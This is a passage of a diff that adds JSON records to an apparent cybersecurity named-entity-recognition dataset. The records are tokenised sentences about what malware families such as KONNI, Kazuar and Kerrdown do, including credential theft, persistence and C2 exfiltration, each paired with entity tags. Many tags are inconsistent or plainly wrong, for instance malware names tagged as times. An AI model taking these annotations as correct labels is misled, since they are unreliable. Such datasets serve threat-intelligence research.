"RPC-based", + "method,", + "this", + "included", + "bypassing", + "UAC", + "set", + "to", + "“AlwaysNotify\"." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "had", + "a", + "feature", + "to", + "steal", + "data", + "from", + "the", + "clipboard." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "has", + "modified", + "ComSysApp", + "service", + "to", + "load", + "the", + "malicious", + "DLL", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "has", + "duplicated", + "the", + "token", + "of", + "a", + "high", + "integrity", + "process", + "to", + "spawn", + "an", + "instance", + "of", + "cmd.exe", + "under", + "an", + "impersonated", + "user." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "can", + "steal", + "profiles", + "(containing", + "credential", + "information)", + "from", + "Firefox,", + "Chrome,", + "and", + "Opera." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "has", + "stored", + "collected", + "information", + "and", + "discovered", + "processes", + "in", + "a", + "tmp", + "file." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "has", + "used", + "certutil", + "to", + "download", + "and", + "decode", + "base64", + "encoded", + "strings", + "and", + "has", + "also", + "devoted", + "a", + "custom", + "section", + "to", + "performing", + "all", + "the", + "components", + "of", + "the", + "deobfuscation", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "is", + "heavily", + "obfuscated", + "and", + "includes", + "encrypted", + "configuration", + "files." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "has", + "sent", + "data", + "and", + "files", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "has", + "used", + "FTP", + "to", + "exfiltrate", + "reconnaissance", + "data", + "out." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "can", + "delete", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "A", + "version", + "of", + "KONNI", + "searches", + "for", + "filenames", + "created", + "with", + "a", + "previous", + "version", + "of", + "the", + "malware,", + "suggesting", + "different", + "versions", + "targeted", + "the", + "same", + "victims", + "and", + "the", + "versions", + "may", + "work", + "together." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "can", + "download", + "files", + "and", + "execute", + "them", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "has", + "executed", + "malicious", + "JavaScript", + "code." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "has", + "the", + "capability", + "to", + "perform", + "keylogging." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "has", + "relied", + "on", + "a", + "victim", + "to", + "enable", + "malicious", + "macros", + "within", + "an", + "attachment", + "delivered", + "via", + "email." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "KONNI", + "has", + "pretended", + "to", + "be", + "the", + "xmlProv", + "Network", + "Provisioning", + "service." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "has", + "created", + "a", + "shortcut", + "called", + "\"Anti", + "virus", + "service.lnk\"", + "in", + "an", + "apparent", + "attempt", + "to", + "masquerade", + "as", + "a", + "legitimate", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "has", + "modified", + "registry", + "keys", + "of", + "ComSysApp,", + "Svchost,", + "and", + "xmlProv", + "on", + "the", + "machine", + "to", + "gain", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "has", + "hardcoded", + "API", + "calls", + "within", + "its", + "functions", + "to", + "use", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "has", + "used", + "parent", + "PID", + "spoofing", + "to", + "spawn", + "a", + "new", + "`cmd`", + "process", + "using", + "`CreateProcessW`", + "and", + "a", + "handle", + "to", + "`Taskmgr.exe`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "KONNI", + "used", + "PowerShell", + "to", + "download", + "and", + "execute", + "a", + "specific", + "64-bit", + "version", + "of", + "the", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "has", + "used", + "the", + "command", + "<code>cmd", + "/c", + "tasklist</code>", + "to", + "get", + "a", + "snapshot", + "of", + "the", + "current", + "processes", + "on", + "the", + "target", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "version", + "of", + "KONNI", + "has", + "dropped", + "a", + "Windows", + "shortcut", + "into", + "the", + "Startup", + "folder", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "has", + "used", + "Rundll32", + "to", + "execute", + "its", + "loader", + "for", + "privilege", + "escalation", + "purposes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "can", + "take", + "screenshots", + "of", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "A", + "version", + "of", + "KONNI", + "drops", + "a", + "Windows", + "shortcut", + "on", + "the", + "victim’s", + "machine", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "has", + "been", + "packed", + "for", + "obfuscation." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "has", + "been", + "delivered", + "via", + "spearphishing", + "campaigns", + "through", + "a", + "malicious", + "Word", + "document." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Org", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "has", + "used", + "a", + "custom", + "base64", + "key", + "to", + "encode", + "stolen", + "data", + "before", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "has", + "used", + "AES", + "to", + "encrypt", + "C2", + "traffic." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "can", + "gather", + "the", + "OS", + "version,", + "architecture", + "information,", + "connected", + "drives,", + "hostname,", + "RAM", + "size,", + "and", + "disk", + "space", + "information", + "from", + "the", + "victim’s", + "machine", + "and", + "has", + "used", + "<code>cmd", + "/c", + "systeminfo</code>", + "command", + "to", + "get", + "a", + "snapshot", + "of", + "the", + "current", + "system", + "state", + "of", + "the", + "target", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "can", + "collect", + "the", + "IP", + "address", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "has", + "used", + "<code>net", + "session</code>", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "can", + "collect", + "the", + "username", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "has", + "used", + "HTTP", + "POST", + "for", + "C2." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "has", + "used", + "cmd.exe", + "to", + "execute", + "arbitrary", + "commands", + "on", + "the", + "infected", + "host", + "across", + "different", + "stages", + "of", + "the", + "infection", + "chain." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KONNI", + "has", + "registered", + "itself", + "as", + "a", + "service", + "using", + "its", + "export", + "function." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KOPILUWAK", + "can", + "gather", + "information", + "from", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KOPILUWAK", + "has", + "exfiltrated", + "collected", + "data", + "to", + "its", + "C2", + "via", + "POST", + "requests." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KOPILUWAK", + "had", + "used", + "Javascript", + "to", + "perform", + "its", + "core", + "functions." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KOPILUWAK", + "has", + "piped", + "the", + "results", + "from", + "executed", + "C2", + "commands", + "to", + "`%TEMP%\\result2.dat`", + "on", + "the", + "local", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KOPILUWAK", + "has", + "gained", + "execution", + "through", + "malicious", + "attachments." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KOPILUWAK", + "can", + "use", + "netstat", + "and", + "Net", + "to", + "discover", + "network", + "shares." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KOPILUWAK", + "can", + "enumerate", + "current", + "running", + "processes", + "on", + "the", + "targeted", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KOPILUWAK", + "has", + "been", + "delivered", + "to", + "victims", + "as", + "a", + "malicious", + "email", + "attachment." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "KOPILUWAK", + "can", + "discover", + "logical", + "drive", + "information", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KOPILUWAK", + "can", + "use", + "Arp", + "to", + "discover", + "a", + "target's", + "network", + "configuration", + "setttings." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KOPILUWAK", + "can", + "use", + "netstat,", + "Arp,", + "and", + "Net", + "to", + "discover", + "current", + "TCP", + "connections." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KOPILUWAK", + "can", + "conduct", + "basic", + "network", + "reconnaissance", + "on", + "the", + "victim", + "machine", + "with", + "`whoami`,", + "to", + "get", + "user", + "details." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "KOPILUWAK", + "has", + "used", + "HTTP", + "POST", + "requests", + "to", + "send", + "data", + "to", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kasidet", + "has", + "the", + "ability", + "to", + "change", + "firewall", + "settings", + "to", + "allow", + "a", + "plug-in", + "to", + "be", + "downloaded." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kasidet", + "has", + "the", + "ability", + "to", + "search", + "for", + "a", + "given", + "filename", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kasidet", + "has", + "the", + "ability", + "to", + "download", + "and", + "execute", + "additional", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Kasidet", + "has", + "the", + "ability", + "to", + "initiate", + "keylogging." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kasidet", + "has", + "the", + "ability", + "to", + "search", + "for", + "a", + "given", + "process", + "name", + "in", + "processes", + "currently", + "running", + "in", + "the", + "system." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kasidet", + "creates", + "a", + "Registry", + "Run", + "key", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kasidet", + "has", + "the", + "ability", + "to", + "initiate", + "keylogging", + "and", + "screen", + "captures." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kasidet", + "has", + "the", + "ability", + "to", + "identify", + "any", + "anti-virus", + "installed", + "on", + "the", + "infected", + "system." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kasidet", + "has", + "the", + "ability", + "to", + "obtain", + "a", + "victim's", + "system", + "name", + "and", + "operating", + "system", + "version." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kasidet", + "can", + "execute", + "commands", + "using", + "cmd.exe." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Kazuar", + "gathers", + "information", + "about", + "opened", + "windows." + ], + "ner_tags": [ + "B-Time", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kazuar", + "has", + "used", + "compromised", + "WordPress", + "blogs", + "as", + "C2", + "servers." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kazuar", + "can", + "overwrite", + "files", + "with", + "random", + "data", + "before", + "deleting", + "them." + ], + "ner_tags": [ + "B-Time", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kazuar", + "uploads", + "files", + "from", + "a", + "specified", + "directory", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Time", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "If", + "running", + "in", + "a", + "Windows", + "environment,", + "Kazuar", + "saves", + "a", + "DLL", + "to", + "disk", + "that", + "is", + "injected", + "into", + "the", + "explorer.exe", + "process", + "to", + "execute", + "the", + "payload.", + "Kazuar", + "can", + "also", + "be", + "configured", + "to", + "inject", + "and", + "execute", + "within", + "specific", + "processes." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kazuar", + "can", + "accept", + "multiple", + "URLs", + "for", + "C2", + "servers." + ], + "ner_tags": [ + "B-Time", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kazuar", + "can", + "delete", + "files." + ], + "ner_tags": [ + "B-Time", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "Kazuar", + "uses", + "FTP", + "and", + "FTPS", + "to", + "communicate", + "with", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-Time", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kazuar", + "finds", + "a", + "specified", + "directory,", + "lists", + "the", + "files", + "and", + "metadata", + "about", + "those", + "files." + ], + "ner_tags": [ + "B-Time", + "B-Features", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kazuar", + "downloads", + "additional", + "plug-ins", + "to", + "load", + "on", + "the", + "victim’s", + "machine,", + "including", + "the", + "ability", + "to", + "upgrade", + "and", + "replace", + "its", + "own", + "binary." + ], + "ner_tags": [ + "B-Time", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Kazuar", + "has", + "used", + "internal", + "nodes", + "on", + "the", + "compromised", + "network", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kazuar", + "gathers", + "information", + "on", + "local", + "groups", + "and", + "members", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Time", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kazuar", + "stages", + "command", + "output", + "and", + "collected", + "data", + "in", + "files", + "before", + "exfiltration." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kazuar", + "gathers", + "information", + "about", + "local", + "groups", + "and", + "members." + ], + "ner_tags": [ + "B-Time", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kazuar", + "is", + "obfuscated", + "using", + "the", + "open", + "source", + "ConfuserEx", + "protector.", + "Kazuar", + "also", + "obfuscates", + "the", + "name", + "of", + "created", + "files/folders/mutexes", + "and", + "encrypts", + "debug", + "messages", + "written", + "to", + "log", + "files", + "using", + "the", + "Rijndael", + "cipher." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Kazuar", + "obtains", + "a", + "list", + "of", + "running", + "processes", + "through", + "WMI", + "querying", + "and", + "the", + "<code>ps</code>", + "command." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kazuar", + "adds", + "a", + "sub-key", + "under", + "several", + "Registry", + "run", + "keys." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kazuar", + "can", + "sleep", + "for", + "a", + "specific", + "time", + "and", + "be", + "set", + "to", + "communicate", + "at", + "specific", + "intervals." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kazuar", + "captures", + "screenshots", + "of", + "the", + "victim’s", + "screen." + ], + "ner_tags": [ + "B-Time", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kazuar", + "adds", + "a", + ".lnk", + "file", + "to", + "the", + "Windows", + "startup", + "folder." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kazuar", + "encodes", + "communications", + "to", + "the", + "C2", + "server", + "in", + "Base64." + ], + "ner_tags": [ + "B-Time", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kazuar", + "gathers", + "information", + "on", + "the", + "system", + "and", + "local", + "drives." + ], + "ner_tags": [ + "B-Time", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kazuar", + "gathers", + "information", + "about", + "network", + "adapters." + ], + "ner_tags": [ + "B-Time", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kazuar", + "gathers", + "information", + "on", + "users." + ], + "ner_tags": [ + "B-Time", + "B-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Kazuar", + "uses", + "/bin/bash", + "to", + "execute", + "commands", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Time", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kazuar", + "captures", + "images", + "from", + "the", + "webcam." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kazuar", + "uses", + "HTTP", + "and", + "HTTPS", + "to", + "communicate", + "with", + "the", + "C2", + "server.", + "Kazuar", + "can", + "also", + "act", + "as", + "a", + "webserver", + "and", + "listen", + "for", + "inbound", + "HTTP", + "requests", + "through", + "an", + "exposed", + "API." + ], + "ner_tags": [ + "B-Time", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kazuar", + "uses", + "cmd.exe", + "to", + "execute", + "commands", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Time", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kazuar", + "obtains", + "a", + "list", + "of", + "running", + "processes", + "through", + "WMI", + "querying." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O" + ] + }, + { + "tokens": [ + "Kazuar", + "can", + "install", + "itself", + "as", + "a", + "new", + "service." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kerrdown", + "can", + "use", + "DLL", + "side-loading", + "to", + "load", + "malicious", + "DLLs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "B-SecTeam", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kerrdown", + "can", + "decode,", + "decrypt,", + "and", + "decompress", + "multiple", + "layers", + "of", + "shellcode." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "B-Features", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kerrdown", + "can", + "download", + "specific", + "payloads", + "to", + "a", + "compromised", + "host", + "based", + "on", + "OS", + "architecture." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kerrdown", + "has", + "gained", + "execution", + "through", + "victims", + "opening", + "malicious", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Kerrdown", + "has", + "gained", + "execution", + "through", + "victims", + "opening", + "malicious", + "links." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kerrdown", + "can", + "encrypt,", + "encode,", + "and", + "compress", + "multiple", + "layers", + "of", + "shellcode." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "B-Features", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Kerrdown", + "has", + "been", + "distributed", + "through", + "malicious", + "e-mail", + "attachments." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Kerrdown", + "has", + "been", + "distributed", + "via", + "e-mails", + "containing", + "a", + "malicious", + "link." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kerrdown", + "has", + "the", + "ability", + "to", + "determine", + "if", + "the", + "compromised", + "host", + "is", + "running", + "a", + "32", + "or", + "64", + "bit", + "OS", + "architecture." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kerrdown", + "can", + "use", + "a", + "VBS", + "base64", + "decoder", + "function", + "published", + "by", + "Motobit." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + 